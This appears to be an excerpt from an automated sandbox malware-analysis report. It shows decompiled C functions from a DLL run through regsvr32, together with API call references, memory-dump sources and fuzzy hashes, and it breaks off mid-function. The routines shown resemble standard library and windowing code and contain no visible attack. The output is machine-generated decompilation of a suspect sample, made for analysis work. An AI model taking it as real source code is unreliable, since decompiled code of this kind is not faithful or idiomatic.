                                                                                                            					E10010B20((_t145[8] << 0x00000004) + 0x00000003 & 0xfffffffc, _t149);
                                                                                                            					 *(_t168 - 0x10) = _t171;
                                                                                                            					 *(_t168 + 0xc) = _t171;
                                                                                                            					E10011C50( *(_t168 + 0xc), 0, _t145[8] << 4);
                                                                                                            					_t174 =  &(_t171[0xc]);
                                                                                                            					_t156 = E10039215( *(_t168 + 8),  *(_t168 - 0x1c));
                                                                                                            					_t38 =  &(_t156[8]); // 0x10
                                                                                                            					_t165 = _t38;
                                                                                                            					_t108 = E10001000(_t149, _t38);
                                                                                                            					_pop(_t151);
                                                                                                            					if(_t108 != 0) {
                                                                                                            						E10010B20( &(_t165[1]) & 0xfffffffc, _t151);
                                                                                                            						 *(_t168 - 0x10) = _t174;
                                                                                                            						_t166 = _t174;
                                                                                                            						_t114 = E10039257( *((intOrPtr*)(_t168 - 0x20)), _t166,  *(_t168 + 8), _t168 - 0x34,  *(_t168 - 0x1c), _t145,  *((intOrPtr*)(_t168 + 0x18)),  *(_t168 + 0xc));
                                                                                                            						_t147 = 0;
                                                                                                            						 *((intOrPtr*)(_t168 + 0x18)) = _t114;
                                                                                                            						if(_t114 != 0) {
                                                                                                            							L17:
                                                                                                            							_t166 =  *(_t168 + 0x14);
                                                                                                            							 *(_t168 - 4) =  *(_t168 - 4) | 0xffffffff;
                                                                                                            							_t157 = 0;
                                                                                                            							if(_t166[8] <= 0) {
                                                                                                            								L20:
                                                                                                            								_t101 =  *((intOrPtr*)(_t168 + 0x18));
                                                                                                            								if(_t101 != 0) {
                                                                                                            									goto L47;
                                                                                                            								}
                                                                                                            								_t156 =  *(_t168 + 0x10);
                                                                                                            								if(_t156 == 0) {
                                                                                                            									_t116 = ( *(_t168 - 0x1c) & 0x0000ffff) - 8;
                                                                                                            									if(_t116 == 0) {
                                                                                                            										if(_t147 != 0) {
                                                                                                            											__imp__#6(_t147);
                                                                                                            										}
                                                                                                            										L46:
                                                                                                            										_t101 = 0;
                                                                                                            										goto L47;
                                                                                                            									}
                                                                                                            									_t117 = _t116 - 1;
                                                                                                            									if(_t117 == 0) {
                                                                                                            										L41:
                                                                                                            										if(_t147 != 0) {
                                                                                                            											 *((intOrPtr*)( *_t147 + 8))(_t147);
                                                                                                            										}
                                                                                                            										goto L46;
                                                                                                            									}
                                                                                                            									_t120 = _t117 - 3;
                                                                                                            									if(_t120 == 0) {
                                                                                                            										__imp__#9(_t168 - 0x34);
                                                                                                            										goto L46;
                                                                                                            									}
                                                                                                            									if(_t120 != 1) {
                                                                                                            										goto L46;
                                                                                                            									}
                                                                                                            									goto L41;
                                                                                                            								}
                                                                                                            								_t123 =  *(_t168 - 0x1c);
                                                                                                            								 *_t156 = _t123;
                                                                                                            								_t125 = (_t123 & 0x0000ffff) + 0xfffffffe;
                                                                                                            								if(_t125 > 0x13) {
                                                                                                            									goto L46;
                                                                                                            								}
                                                                                                            								switch( *((intOrPtr*)(_t125 * 4 +  &M10039776))) {
                                                                                                            									case 0:
                                                                                                            										L35:
                                                                                                            										 *(__edi + 8) = __bx;
                                                                                                            										goto L46;
                                                                                                            									case 1:
                                                                                                            										 *(__edi + 8) = __ebx;
                                                                                                            										goto L46;
                                                                                                            									case 2:
                                                                                                            										__eax =  *(__ebp - 0x34);
                                                                                                            										 *(__edi + 8) =  *(__ebp - 0x34);
                                                                                                            										goto L46;
                                                                                                            									case 3:
                                                                                                            										 *(__edi + 8) =  *(__ebp - 0x34);
                                                                                                            										goto L46;
                                                                                                            									case 4:
                                                                                                            										__eax =  *(__ebp - 0x34);
                                                                                                            										 *(__edi + 8) =  *(__ebp - 0x34);
                                                                                                            										__eax =  *(__ebp - 0x30);
                                                                                                            										 *(__edi + 0xc) =  *(__ebp - 0x30);
                                                                                                            										goto L46;
                                                                                                            									case 5:
                                                                                                            										__ebx =  ~__ebx;
                                                                                                            										asm("sbb ebx, ebx");
                                                                                                            										goto L35;
                                                                                                            									case 6:
                                                                                                            										asm("movsd");
                                                                                                            										asm("movsd");
                                                                                                            										asm("movsd");
                                                                                                            										asm("movsd");
                                                                                                            										goto L46;
                                                                                                            									case 7:
                                                                                                            										goto L46;
                                                                                                            									case 8:
                                                                                                            										 *(__edi + 8) = __bl;
                                                                                                            										goto L46;
                                                                                                            								}
                                                                                                            							}
                                                                                                            							do {
                                                                                                            								__imp__#9( *(_t168 + 0xc));
                                                                                                            								 *(_t168 + 0xc) =  &(( *(_t168 + 0xc))[0x10]);
                                                                                                            								_t157 = _t157 + 1;
                                                                                                            							} while (_t157 < _t166[8]);
                                                                                                            							goto L20;
                                                                                                            						}
                                                                                                            						_t128 =  *(_t168 - 0x1c) & 0x0000ffff;
                                                                                                            						 *(_t168 - 4) = 0;
                                                                                                            						if(_t128 == 4) {
                                                                                                            							_push(_t156);
                                                                                                            							_push(_t166);
                                                                                                            							_push( *(_t168 - 0x18));
                                                                                                            							E1003A087();
                                                                                                            							 *(_t168 + 8) = _t182;
                                                                                                            							 *(_t168 - 0x34) =  *(_t168 + 8);
                                                                                                            							goto L17;
                                                                                                            						}
                                                                                                            						if(_t128 == 5) {
                                                                                                            							_push(_t156);
                                                                                                            							_push(_t166);
                                                                                                            							_push( *(_t168 - 0x18));
                                                                                                            							E1003A087();
                                                                                                            							asm("fst qword [ebp-0x24]");
                                                                                                            							L27:
                                                                                                            							 *(_t168 - 0x34) = _t182;
                                                                                                            							goto L17;
                                                                                                            						}
                                                                                                            						if(_t128 == 7) {
                                                                                                            							_push(_t156);
                                                                                                            							_push(_t166);
                                                                                                            							_push( *(_t168 - 0x18));
                                                                                                            							E1003A087();
                                                                                                            							asm("fst qword [ebp-0x24]");
                                                                                                            							goto L27;
                                                                                                            						}
                                                                                                            						if(_t128 <= 0x13 || _t128 > 0x15) {
                                                                                                            							_push(_t156);
                                                                                                            							_push(_t166);
                                                                                                            							_push( *(_t168 - 0x18));
                                                                                                            							_t147 = E1003A087();
                                                                                                            						} else {
                                                                                                            							_push(_t156);
                                                                                                            							_push(_t166);
                                                                                                            							_push( *(_t168 - 0x18));
                                                                                                            							 *(_t168 - 0x34) = E1003A087();
                                                                                                            							 *((intOrPtr*)(_t168 - 0x30)) = _t153;
                                                                                                            						}
                                                                                                            						goto L17;
                                                                                                            					}
                                                                                                            					goto L9;
                                                                                                            				}
                                                                                                            				_t17 = _t161 + 3; // 0x3
                                                                                                            				_t158 = _t17;
                                                                                                            				_t134 = E10001000(_t148, _t17);
                                                                                                            				_pop(_t148);
                                                                                                            				if(_t134 == 0) {
                                                                                                            					goto L9;
                                                                                                            				}
                                                                                                            				E10010B20(_t158 + 0x00000003 & 0xfffffffc, _t148);
                                                                                                            				 *(_t168 - 0x10) = _t171;
                                                                                                            				_t159 = _t171;
                                                                                                            				E10011440(_t159,  *(_t168 + 8), _t161);
                                                                                                            				_t140 = _t144[0xc];
                                                                                                            				_t171 =  &(_t171[0xc]);
                                                                                                            				 *(_t168 + 8) = _t159;
                                                                                                            				if(_t140 == 8) {
                                                                                                            					_t140 = 0xe;
                                                                                                            				}
                                                                                                            				_t159[_t161] = 0xff;
                                                                                                            				_t167 = _t161 + 1;
                                                                                                            				 *(_t168 - 0x1c) =  *(_t168 - 0x1c) & 0x00000000;
                                                                                                            				_t159[_t167] = _t140;
                                                                                                            				_t159[_t167 + 1] = 0;
                                                                                                            				 *(_t168 - 0x18) = _t144[0x14];
                                                                                                            				goto L7;
                                                                                                            			}

                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 100394B5
                                                                                                            • lstrlenA.KERNEL32(?,?,00000000), ref: 100394E0
                                                                                                            • VariantClear.OLEAUT32(0000000C), ref: 1003963C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClearH_prologVariantlstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 2416264355-0
                                                                                                            • Opcode ID: 01d55cbef57070eba50bc1bacdd47ccffadd2fabc5e95ff73a26932456179a65
                                                                                                            • Instruction ID: 794d22016aebeea8945113baaba77667614d3c7e1eb394332e3a898872445e5b
                                                                                                            • Opcode Fuzzy Hash: 01d55cbef57070eba50bc1bacdd47ccffadd2fabc5e95ff73a26932456179a65
                                                                                                            • Instruction Fuzzy Hash: 8381B13590465AEFCF12CFA9C881A9EBBB5FF05391F208115F854AF291D735EA90CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 78%
                                                                                                            			E10018BEF(intOrPtr* _a4) {
                                                                                                            				signed int _v8;
                                                                                                            				signed int _v12;
                                                                                                            				signed int _v16;
                                                                                                            				intOrPtr _v20;
                                                                                                            				intOrPtr _v24;
                                                                                                            				void* __edi;
                                                                                                            				void* __ebp;
                                                                                                            				intOrPtr* _t89;
                                                                                                            				void* _t90;
                                                                                                            				void* _t101;
                                                                                                            				intOrPtr _t112;
                                                                                                            				void* _t115;
                                                                                                            				signed int _t120;
                                                                                                            				signed int _t125;
                                                                                                            				intOrPtr _t132;
                                                                                                            				intOrPtr _t133;
                                                                                                            				void* _t138;
                                                                                                            				intOrPtr _t140;
                                                                                                            				signed int _t142;
                                                                                                            				signed int _t143;
                                                                                                            				signed int _t146;
                                                                                                            				signed int _t147;
                                                                                                            				signed int _t148;
                                                                                                            				signed int _t149;
                                                                                                            				signed int _t150;
                                                                                                            				signed int _t152;
                                                                                                            				void* _t159;
                                                                                                            				intOrPtr _t162;
                                                                                                            				signed int _t164;
                                                                                                            				signed int _t165;
                                                                                                            				void* _t168;
                                                                                                            				void* _t169;
                                                                                                            				void* _t170;
                                                                                                            				void* _t172;
                                                                                                            				intOrPtr* _t173;
                                                                                                            				intOrPtr _t174;
                                                                                                            				void* _t176;
                                                                                                            				intOrPtr _t180;
                                                                                                            
                                                                                                            				_t89 = _a4;
                                                                                                            				_v12 = _v12 & 0x00000000;
                                                                                                            				_t133 =  *((intOrPtr*)(_t89 + 4));
                                                                                                            				_t162 =  *_t89;
                                                                                                            				_v24 = _t162;
                                                                                                            				_v20 = _t133;
                                                                                                            				_t90 = E1001519D(_t162);
                                                                                                            				_t174 = _t133;
                                                                                                            				_t172 = _t90;
                                                                                                            				if(_t174 < 0 || _t174 <= 0 && _t162 < 0) {
                                                                                                            					L28:
                                                                                                            					return 0;
                                                                                                            				} else {
                                                                                                            					_t176 = _t133 - 0x1000;
                                                                                                            					if(_t176 > 0 || _t176 >= 0 && _t162 > 0) {
                                                                                                            						goto L28;
                                                                                                            					} else {
                                                                                                            						if( *((intOrPtr*)(_t172 + 0x44)) != 0) {
                                                                                                            							L9:
                                                                                                            							_t173 =  *((intOrPtr*)(_t172 + 0x44));
                                                                                                            							L10:
                                                                                                            							_t142 = E10013780(_t162, _t133, 0x1e13380, 0) + 0x46;
                                                                                                            							_t10 = _t142 + 0x12b; // 0xe5
                                                                                                            							asm("cdq");
                                                                                                            							_t15 = _t142 - 1; // -71
                                                                                                            							_v16 = _t15;
                                                                                                            							_v8 = _t142;
                                                                                                            							asm("cdq");
                                                                                                            							_t164 = 0x64;
                                                                                                            							_t165 = 4;
                                                                                                            							asm("cdq");
                                                                                                            							_t28 = _v16 / _t165 - 0x11; // 0xd4
                                                                                                            							asm("cdq");
                                                                                                            							_t29 = _t142 - 0x46; // -140
                                                                                                            							asm("cdq");
                                                                                                            							_t101 = E100122A0(_t29, _v16 % _t165, 0xfffffe93, 0xffffffff);
                                                                                                            							asm("sbb edx, ebx");
                                                                                                            							_t138 = 0x15180;
                                                                                                            							_t168 = _v24 + E100122A0(_t101 - _t10 / 0x190 - _t15 / _t164 + _t28, _v16 % _t165, 0x15180, 0);
                                                                                                            							asm("adc [ebp-0x10], edx");
                                                                                                            							_t180 = _v20;
                                                                                                            							if(_t180 > 0 || _t180 >= 0 && _t168 >= 0) {
                                                                                                            								asm("cdq");
                                                                                                            								_t143 = 4;
                                                                                                            								if(_v8 % _t143 != 0) {
                                                                                                            									L19:
                                                                                                            									asm("cdq");
                                                                                                            									_t158 = (_v8 + 0x76c) % 0x190;
                                                                                                            									if((_v8 + 0x76c) % 0x190 != 0) {
                                                                                                            										goto L21;
                                                                                                            									}
                                                                                                            									goto L20;
                                                                                                            								}
                                                                                                            								asm("cdq");
                                                                                                            								_t149 = 0x64;
                                                                                                            								_t158 = _v8 % _t149;
                                                                                                            								if(_v8 % _t149 != 0) {
                                                                                                            									goto L20;
                                                                                                            								}
                                                                                                            								goto L19;
                                                                                                            							} else {
                                                                                                            								_t125 = _v16;
                                                                                                            								_v8 = _t125;
                                                                                                            								_t168 = _t168 + 0x1e13380;
                                                                                                            								asm("adc dword [ebp-0x10], 0x0");
                                                                                                            								asm("cdq");
                                                                                                            								_t150 = 4;
                                                                                                            								if(_t125 % _t150 != 0) {
                                                                                                            									L15:
                                                                                                            									asm("cdq");
                                                                                                            									_t158 = (_v8 + 0x76c) % 0x190;
                                                                                                            									if((_v8 + 0x76c) % 0x190 != 0) {
                                                                                                            										L21:
                                                                                                            										 *((intOrPtr*)(_t173 + 0x14)) = _v8;
                                                                                                            										 *((intOrPtr*)(_t173 + 0x1c)) = E10013780(_t168, _v20, _t138, 0);
                                                                                                            										asm("cdq");
                                                                                                            										_t169 = _t168 + E100122A0(_t110, _t158, 0xfffeae80, 0xffffffff);
                                                                                                            										asm("adc [ebp-0x10], edx");
                                                                                                            										_t159 = 0x1004ce98;
                                                                                                            										if(_v12 == 0) {
                                                                                                            											_t159 = 0x1004cecc;
                                                                                                            										}
                                                                                                            										_t112 =  *((intOrPtr*)(_t173 + 0x1c));
                                                                                                            										_t146 = 1;
                                                                                                            										if( *((intOrPtr*)(_t159 + 4)) >= _t112) {
                                                                                                            											L27:
                                                                                                            											_t147 = _t146 - 1;
                                                                                                            											 *(_t173 + 0x10) = _t147;
                                                                                                            											 *((intOrPtr*)(_t173 + 0xc)) = _t112 -  *((intOrPtr*)(_t159 + _t147 * 4));
                                                                                                            											_t115 = E10013780( *_a4,  *((intOrPtr*)(_a4 + 4)), _t138, 0);
                                                                                                            											_t148 = 7;
                                                                                                            											asm("cdq");
                                                                                                            											 *(_t173 + 0x18) = (_t115 + 4) % _t148;
                                                                                                            											 *((intOrPtr*)(_t173 + 8)) = E10013780(_t169, _v20, 0xe10, 0);
                                                                                                            											asm("cdq");
                                                                                                            											_t170 = _t169 + E100122A0(_t118, (_t115 + 4) % _t148, 0xfffff1f0, 0xffffffff);
                                                                                                            											asm("adc [ebp-0x10], edx");
                                                                                                            											_t120 = E10013780(_t170, _v20, 0x3c, 0);
                                                                                                            											 *(_t173 + 4) = _t120;
                                                                                                            											 *_t173 = _t170 - _t120 * 0x3c;
                                                                                                            											 *((intOrPtr*)(_t173 + 0x20)) = 0;
                                                                                                            											return _t173;
                                                                                                            										} else {
                                                                                                            											_t140 = _t112;
                                                                                                            											do {
                                                                                                            												_t146 = _t146 + 1;
                                                                                                            											} while ( *((intOrPtr*)(_t159 + _t146 * 4)) < _t140);
                                                                                                            											_t138 = 0x15180;
                                                                                                            											goto L27;
                                                                                                            										}
                                                                                                            									}
                                                                                                            									L16:
                                                                                                            									_t168 = _t168 + _t138;
                                                                                                            									asm("adc dword [ebp-0x10], 0x0");
                                                                                                            									L20:
                                                                                                            									_v12 = 1;
                                                                                                            									goto L21;
                                                                                                            								}
                                                                                                            								asm("cdq");
                                                                                                            								_t152 = 0x64;
                                                                                                            								_t158 = _v8 % _t152;
                                                                                                            								if(_v8 % _t152 != 0) {
                                                                                                            									goto L16;
                                                                                                            								}
                                                                                                            								goto L15;
                                                                                                            							}
                                                                                                            						}
                                                                                                            						_t132 = E100107B6(0x24);
                                                                                                            						 *((intOrPtr*)(_t172 + 0x44)) = _t132;
                                                                                                            						if(_t132 != 0) {
                                                                                                            							goto L9;
                                                                                                            						}
                                                                                                            						_t173 = 0x1004f744;
                                                                                                            						goto L10;
                                                                                                            					}
                                                                                                            				}
                                                                                                            			}

                                                                                                            0x10018cfe
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10018cfe
                                                                                                            0x10018cd1
                                                                                                            0x10018c41
                                                                                                            0x10018c49
                                                                                                            0x10018c4c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10018c4e
                                                                                                            0x00000000
                                                                                                            0x10018c4e
                                                                                                            0x10018c29

                                                                                                            APIs
                                                                                                              • Part of subcall function 1001519D: GetLastError.KERNEL32(?,00000000,100136FA,100139FA,00000000,10041E50,00000008,10013A51,?,?,?,10015293,0000000D,10041EB0,00000010,10015375), ref: 1001519F
                                                                                                              • Part of subcall function 1001519D: FlsGetValue.KERNEL32(?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?,?,10041D40), ref: 100151AD
                                                                                                              • Part of subcall function 1001519D: FlsSetValue.KERNEL32(00000000,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?,?), ref: 100151D4
                                                                                                              • Part of subcall function 1001519D: GetCurrentThreadId.KERNEL32 ref: 100151EC
                                                                                                              • Part of subcall function 1001519D: SetLastError.KERNEL32(00000000,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?,?), ref: 10015203
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10018C61
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10018D5E
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10018DB7
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10018DD4
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10018DF7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$ErrorLastValue$CurrentThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 223281555-0
                                                                                                            • Opcode ID: 1693e817e5266281a194762ea474d98223fd442ae3dcdc5ad9847de1fdbd58a6
                                                                                                            • Instruction ID: 428b4c813f629567aa63a678bca7b6061bdb39fa1b2836493da5e96e2c7cad82
                                                                                                            • Opcode Fuzzy Hash: 1693e817e5266281a194762ea474d98223fd442ae3dcdc5ad9847de1fdbd58a6
                                                                                                            • Instruction Fuzzy Hash: 3361B1B6A00306ABD714DEA9CC41BAEB3F6EB84354F25452DF5119B2C1D7B5EB808B50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 59%
                                                                                                            			E1002D821(intOrPtr __ecx, void* __edx) {
                                                                                                            				void* __ebx;
                                                                                                            				void* __esi;
                                                                                                            				void* __ebp;
                                                                                                            				intOrPtr _t70;
                                                                                                            				signed char _t75;
                                                                                                            				signed int _t80;
                                                                                                            				signed int _t81;
                                                                                                            				signed int _t85;
                                                                                                            				signed int _t87;
                                                                                                            				void* _t95;
                                                                                                            				intOrPtr _t125;
                                                                                                            				intOrPtr _t133;
                                                                                                            				void* _t147;
                                                                                                            				void* _t151;
                                                                                                            				intOrPtr _t155;
                                                                                                            				void* _t158;
                                                                                                            				void* _t160;
                                                                                                            
                                                                                                            				_t147 = __edx;
                                                                                                            				_t158 = _t160 - 0xb0;
                                                                                                            				_t70 =  *0x1004c470; // 0xf3933a06
                                                                                                            				_t155 =  *((intOrPtr*)(_t158 + 0xb8));
                                                                                                            				 *((intOrPtr*)(_t158 + 0xac)) = _t70;
                                                                                                            				_t125 = __ecx;
                                                                                                            				_t72 = GetWindowRect( *(_t155 + 0x1c), _t158 - 0x80);
                                                                                                            				if( *((intOrPtr*)(_t155 + 0x88)) != _t125 ||  *(_t158 + 0xbc) != 0 && EqualRect(_t158 - 0x80,  *(_t158 + 0xbc)) == 0) {
                                                                                                            					if( *((intOrPtr*)(_t125 + 0x90)) != 0 && ( *(_t155 + 0x80) & 0x00000040) != 0) {
                                                                                                            						 *(_t125 + 0x7c) =  *(_t125 + 0x7c) | 0x00000040;
                                                                                                            					}
                                                                                                            					 *(_t125 + 0x7c) =  *(_t125 + 0x7c) & 0xfffffff9;
                                                                                                            					_t75 =  *(_t155 + 0x7c) & 0x00000006 |  *(_t125 + 0x7c);
                                                                                                            					 *(_t125 + 0x7c) = _t75;
                                                                                                            					if((_t75 & 0x00000040) == 0) {
                                                                                                            						_push(0x104);
                                                                                                            						_push(_t158 - 0x58);
                                                                                                            						E1002095F(_t155);
                                                                                                            						E10029B23(_t155,  *((intOrPtr*)(_t125 + 0x1c)), _t158 - 0x58);
                                                                                                            					}
                                                                                                            					_t80 = ( *(_t155 + 0x7c) ^  *(_t125 + 0x7c)) & 0x0000f000 ^  *(_t155 + 0x7c) | 0x00000f00;
                                                                                                            					if( *((intOrPtr*)(_t125 + 0x90)) == 0) {
                                                                                                            						_t81 = _t80 & 0xfffffffe;
                                                                                                            					} else {
                                                                                                            						_t81 = _t80 | 0x00000001;
                                                                                                            					}
                                                                                                            					E100383D0(_t155, _t81);
                                                                                                            					 *((intOrPtr*)(_t158 - 0x6c)) = 0;
                                                                                                            					if( *((intOrPtr*)(_t155 + 0x88)) != _t125 && IsWindowVisible( *(_t155 + 0x1c)) != 0) {
                                                                                                            						E100204FE(_t155, 0, 0, 0, 0, 0, 0x97);
                                                                                                            						 *((intOrPtr*)(_t158 - 0x6c)) = 1;
                                                                                                            					}
                                                                                                            					 *(_t158 - 0x70) =  *(_t158 - 0x70) | 0xffffffff;
                                                                                                            					if( *(_t158 + 0xbc) == 0) {
                                                                                                            						_t57 = _t125 + 0x94; // 0x94
                                                                                                            						_t150 = _t57;
                                                                                                            						E1001E2BE(_t57, _t158,  *((intOrPtr*)(_t57 + 8)), _t155);
                                                                                                            						E1001E2BE(_t150, _t158,  *((intOrPtr*)(_t150 + 8)), 0);
                                                                                                            						_t85 =  *0x1004efa4; // 0x2
                                                                                                            						_t151 = 0;
                                                                                                            						_t87 =  *0x1004efa0; // 0x2
                                                                                                            						E100204FE(_t155, 0,  ~_t87,  ~_t85, 0, 0, 0x115);
                                                                                                            					} else {
                                                                                                            						CopyRect(_t158 - 0x68,  *(_t158 + 0xbc));
                                                                                                            						E10028E5A(_t125, _t158 - 0x68);
                                                                                                            						asm("cdq");
                                                                                                            						asm("cdq");
                                                                                                            						_push(( *((intOrPtr*)(_t158 - 0x5c)) -  *((intOrPtr*)(_t158 - 0x64)) - _t147 >> 1) +  *((intOrPtr*)(_t158 - 0x64)));
                                                                                                            						_push(( *((intOrPtr*)(_t158 - 0x60)) -  *(_t158 - 0x68) - _t147 >> 1) +  *(_t158 - 0x68));
                                                                                                            						_push( *((intOrPtr*)(_t158 + 0xb8)));
                                                                                                            						asm("movsd");
                                                                                                            						asm("movsd");
                                                                                                            						asm("movsd");
                                                                                                            						asm("movsd");
                                                                                                            						 *(_t158 - 0x70) = E1002CE2A(_t125);
                                                                                                            						E100204FE( *((intOrPtr*)(_t158 + 0xb8)), 0,  *(_t158 - 0x68),  *((intOrPtr*)(_t158 - 0x64)),  *((intOrPtr*)(_t158 - 0x60)) -  *(_t158 - 0x68),  *((intOrPtr*)(_t158 - 0x5c)) -  *((intOrPtr*)(_t158 - 0x64)), 0x114);
                                                                                                            						_t155 =  *((intOrPtr*)(_t158 + 0xb8));
                                                                                                            						_t151 = 0;
                                                                                                            					}
                                                                                                            					if(E100220EE(_t158, GetParent( *(_t155 + 0x1c))) != _t125) {
                                                                                                            						E1000870E(_t155, _t125);
                                                                                                            					}
                                                                                                            					_t133 =  *((intOrPtr*)(_t155 + 0x88));
                                                                                                            					if(_t133 != _t125) {
                                                                                                            						if(_t133 != _t151) {
                                                                                                            							if( *((intOrPtr*)(_t125 + 0x90)) == _t151 ||  *((intOrPtr*)(_t133 + 0x90)) != _t151) {
                                                                                                            								_t95 = 0;
                                                                                                            							} else {
                                                                                                            								_t95 = 1;
                                                                                                            							}
                                                                                                            							_push(_t95);
                                                                                                            							_push(0xffffffff);
                                                                                                            							goto L27;
                                                                                                            						}
                                                                                                            					} else {
                                                                                                            						_push(_t151);
                                                                                                            						_push( *(_t158 - 0x70));
                                                                                                            						L27:
                                                                                                            						_push(_t155);
                                                                                                            						E1002D1B2(_t133);
                                                                                                            					}
                                                                                                            					 *((intOrPtr*)(_t155 + 0x88)) = _t125;
                                                                                                            					if( *((intOrPtr*)(_t158 - 0x6c)) != _t151) {
                                                                                                            						E100204FE(_t155, _t151, _t151, _t151, _t151, _t151, 0x57);
                                                                                                            					}
                                                                                                            					E1002D14B(_t125, _t125, _t158, _t155);
                                                                                                            					 *(E100314D8(_t125) + 0xcc) =  *(_t72 + 0xcc) | 0x0000000c;
                                                                                                            				}
                                                                                                            				return E100117AE(_t72,  *((intOrPtr*)(_t158 + 0xac)));
                                                                                                            			}




















                                                                                                            0x1002da1c
                                                                                                            0x1002da1c
                                                                                                            0x1002da1d
                                                                                                            0x1002da40
                                                                                                            0x1002da40
                                                                                                            0x1002da41
                                                                                                            0x1002da41
                                                                                                            0x1002da49
                                                                                                            0x1002da4f
                                                                                                            0x1002da5a
                                                                                                            0x1002da5a
                                                                                                            0x1002da62
                                                                                                            0x1002da6e
                                                                                                            0x1002da6e
                                                                                                            0x1002da8a

                                                                                                            APIs
                                                                                                            • GetWindowRect.USER32 ref: 1002D84C
                                                                                                            • EqualRect.USER32 ref: 1002D872
                                                                                                            • IsWindowVisible.USER32(?), ref: 1002D900
                                                                                                            • CopyRect.USER32 ref: 1002D93C
                                                                                                            • GetParent.USER32(?), ref: 1002D9FA
                                                                                                              • Part of subcall function 1000870E: SetParent.USER32(?,00000000), ref: 1000871D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Rect$ParentWindow$CopyEqualVisible
                                                                                                            • String ID:
                                                                                                            • API String ID: 545338366-0
                                                                                                            • Opcode ID: b7172a7f28e0920b39c9b267a61c58c2106efd665f0b045fbba897e8ea2e6f4b
                                                                                                            • Instruction ID: 33a625b915a49ab54241972194f75ebdbdf7b4231d1b3c0eb1f8f86e0de30ee8
                                                                                                            • Opcode Fuzzy Hash: b7172a7f28e0920b39c9b267a61c58c2106efd665f0b045fbba897e8ea2e6f4b
                                                                                                            • Instruction Fuzzy Hash: 86619A71600649AFDB61EFA8DC85FAE77FAEB44300F50812AE959DB196CB30AC45CB11
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10014691(signed int _a4) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				struct _MEMORY_BASIC_INFORMATION _v36;
                                                                                                            				signed int _t51;
                                                                                                            				void* _t52;
                                                                                                            				signed int _t53;
                                                                                                            				signed int _t55;
                                                                                                            				signed int _t56;
                                                                                                            				signed int _t57;
                                                                                                            				signed int* _t60;
                                                                                                            				intOrPtr* _t61;
                                                                                                            				intOrPtr _t63;
                                                                                                            				signed int _t64;
                                                                                                            				signed int* _t66;
                                                                                                            				signed int _t67;
                                                                                                            				intOrPtr _t68;
                                                                                                            				void* _t69;
                                                                                                            				signed int _t70;
                                                                                                            				void* _t71;
                                                                                                            				intOrPtr _t73;
                                                                                                            				void _t74;
                                                                                                            				signed int _t75;
                                                                                                            				signed int _t76;
